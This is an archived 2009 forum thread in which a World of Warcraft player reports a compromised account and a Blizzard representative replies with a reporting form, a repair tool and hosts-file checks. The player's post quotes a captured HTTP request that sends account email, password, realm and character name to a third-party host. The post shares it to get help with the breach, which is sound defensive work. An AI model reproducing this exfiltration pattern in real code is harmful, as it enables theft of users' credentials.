Blue Tracker
World of Warcraft Blue Posts
Diablo II: Resurrected Blue Posts
Diablo III Blue Posts
Hearthstone Blue Posts
Overwatch Blue Posts
Heroes of the Storm Blue Posts
Diablo IV Blue Posts
BlizzCon Blue Posts
Warcraft Rumble Blue Posts

Packet sniffer and a compromised account

Forum Avatar
Galloway
#0 - Dec. 6, 2009, 10:25 p.m.
Blizzard Post
Recently my wow account was compromised. The PC has always had an AV installed, patched, no warez, etc. I took a look with several AV tools and rootkit tools (Icesword, GMER) and couldn't turn anything up. I finally found something interesting after installing a packet sniffer tool and thought I would share the results I found. I would also appreciate any feedback since I'm not a computer security expert.

Using smartsniff... After succesful login the following packet was sent to an IP address owned by a Texas ISP (as opposed to the packets sent to Blizzard owned locations):

GET /wow/[email protected]&pw=password123&s1=us&rm=0&s2=Nesingwary&Appe=7-XP&rl=1&rn=Caylbouris HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Host: suomali.<redacted>.info
Connection: Keep-Alive

whois indicates the host is registered through godaddy.com with most of the information hidden.

Any chance someone can confirm that this is a rogue transmission? I haven't had time to try it on a clean box yet.

Monitoring the wow.exe process with Socketsniff indicates that the packets are originating from the wow process.

I'm not sure what to make of this. Obviously haven't been installing .exe addons or wow hacks/cheats. This seems to indicate security breach is limited to wow as opposed to system-wide problem. Comments?

My only theory on the PC compromise is that it was sitting without a HW firewall (actually in a DMZ) for the past year because I completely screwed up router config (actually i was trying some stuff out and forgot to reset it to something secure).
Forum Avatar
Charlesps
#2 - Dec. 6, 2009, 11:22 p.m.
Blizzard Post
Hello Galloway

Can you fill out the form here:
http://us.blizzard.com/support/article.xml?locale=en_US&tag=hacksform

And use it to alert our hacks team with this information.

If you have any files you want to send them please follow the instructions at the bottom of that page and send them to [email protected]

you may want to try moving the wow.exe outside of your World of Warcraft folder then run the repair utility and then try the game once it replaces the wow.exe

Use the one we have here:
http://ftp.blizzard.com/pub/WoW/other/Repair.zip

you may also want to check the hosts files on your system.

1) Click on Start then Search or Find files and folders to search your hard drive for a specific file.
2) In the file name field, type the word "hosts" (without the quotes) and search for that file.
3) Once Windows has found the file(s), you may want to make a backup copy and name it hosts.bak.
4) Double-click the hosts file (not the backup) and choose to open it using Notepad.
5) The term ".battle.net and warcraft" should not appear anywhere in this document.
6) If you see any entries like this please delete them.
7) Close the Notepad document and choose Yes when it asks you if you want to save the changes.
8) Repeat the steps above for each hosts file you find on the hard drive. No hosts file should include any information about Battle.net or warcraft.